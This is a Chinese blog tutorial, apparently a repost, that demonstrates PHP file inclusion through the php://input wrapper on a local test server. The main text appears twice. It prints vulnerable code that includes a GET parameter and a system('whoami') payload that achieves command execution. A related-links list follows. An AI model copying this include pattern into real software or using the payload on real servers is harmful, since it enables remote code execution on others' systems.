php文件报告 php内置协议 访问cmd执行系统命令
2016-01-06 23:35
267 查看
这个漏洞需要有前提条件的 需要修改php.ini 一个参数才可以执行漏洞
修改allow_url_include = On 这样在配合php文件包含 php内置协议 就可以执行漏洞了
修改完成 重启apache 接着查看我们服务器php文件源代码
万年不变源代码
使用浏览器打开网站
http://192.168.1.106/test_php_local/index.php?func=php:\\input
报错 到这里还不能确定有没有php内置协议漏洞 接着往下看
下面我有用burp抓取数据包
看到没有 使用burp 没有返回信息 说明可能有这个漏洞
直接上命令
<?php system("whoami"); ?>
ok系统命令执行了 存在漏洞
修改allow_url_include = On 这样在配合php文件包含 php内置协议 就可以执行漏洞了
修改完成 重启apache 接着查看我们服务器php文件源代码
万年不变源代码
<?php if ($_GET['func']) { include $_GET['func']; } else { include 'default.php'; } ?>
使用浏览器打开网站
http://192.168.1.106/test_php_local/index.php?func=php:\\input
报错 到这里还不能确定有没有php内置协议漏洞 接着往下看
下面我有用burp抓取数据包
看到没有 使用burp 没有返回信息 说明可能有这个漏洞
直接上命令
<?php system("whoami"); ?>
ok系统命令执行了 存在漏洞
相关文章推荐
- PHP 笔记一(systax/variables/echo/print/Data Type)
- php线程
- php 注释 会不会 影响 效率 性能
- php历史版本页面
- IntelliJ IDEA15,PhpStorm10,WebStorm11激活破解
- 使用phpize为编译好的PHP安装拓展模块
- php的学习经验
- 如何使用EditPlus批量删除 带有某个字符的一行
- php实现文件上传
- 最新php环境搭建
- windows 2008 r2 ftp 问题
- phpcms 站点管理增加联系方式备案等字段等
- php扩展模块如何安装
- php_fpm配置文件
- php安装编译时 configure: error: Cannot find OpenSSL's <evp.h>
- PHP原生--截取中文字符串,并生成省略...
- 在Windows Server 2008 R2上安装Ftp服务
- php判断IE浏览器
- ubuntu10 下 TFTP搭建
- 如何卸载FileZilla的Ftp服务